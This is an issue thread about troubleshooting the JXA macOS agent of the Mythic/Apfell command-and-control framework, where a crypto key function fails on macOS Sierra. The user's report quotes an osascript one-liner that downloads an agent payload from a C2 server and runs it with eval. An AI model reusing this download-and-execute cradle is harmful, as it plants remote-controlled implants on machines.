### ISSUE TITLE
Execution error on macOS using jxa agent

### ISSUE THREAD

**Issue by hostsomecode** [its-a-feature/Mythic#11]
Hi, so I've got Apfell up and running on Ubuntu server.
Installation was smooth so no problem with that, I want to thank you for such detailed installation/user guide.
I did test `viper` agent and it worked fine on Linux test machine.
But when it comes to `jxa` agent for macOS, I'm getting error when trying to execute this command via Terminal:
`osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('http://xxx.xxx.xx.xxx/api/v1.3/files/download/redacted')),$.NSUTF8StringEncoding)));"`
Output error:
`execution error: Error on line 135: TypeError: $.SecKeyCreateRandomKey is not a function. (In '$.SecKeyCreateRandomKey(parameters, Ref())', '$.SecKeyCreateRandomKey' is undefined) (-2700)`
I have made sure that I can access the payload from target machine when pulling it manually. IPs are not blocked.
Machine is running macOS Sierra 10.12.
Has Oracle JDK 13.0.1 installed.
I've reviewed all 9 previous issues and none seem to be related. So, I hope you can point me to right direction! Thank you.

**Comment by its-a-feature** [comment]
I'll boot up a 10.12 machine to test at the end of the day, but in the meantime, can you confirm that there's the line `ObjC.import('Security');` in the file? That error is happening during the encrypted key exchange while it tries to create a new RSA key. Supposedly that function exists in 10.12 according to Apple (https://developer.apple.com/documentation/security/1823694-seckeycreaterandomkey?language=objc), but it might be a version thing too. 

For testing sake, can you generate a payload that has the `AESPSK` field blank and `F` for the encrypted key exchange? That'll help narrow down if this is the only issue or if there are additional issues after this one. I'm guessing that if it's failing to find that function, it'll fail to find all of the crypto related functions.

**Comment by hostsomecode** [comment]
Hi, yes, I can confirm it existed in previously generated `jxa-payload` with default settings as it comes out of box.
I did generated payload as you requested, leaving `AESPSK` field empty and `F` for encrypted key exchange. I did execute same command with newly generated payload file (hosted) and it worked! 
Agent called back home :)

Thank you for quick assistance on this one, I'll be researching this tool further, I really appreciate all this hard work that is put into this project.
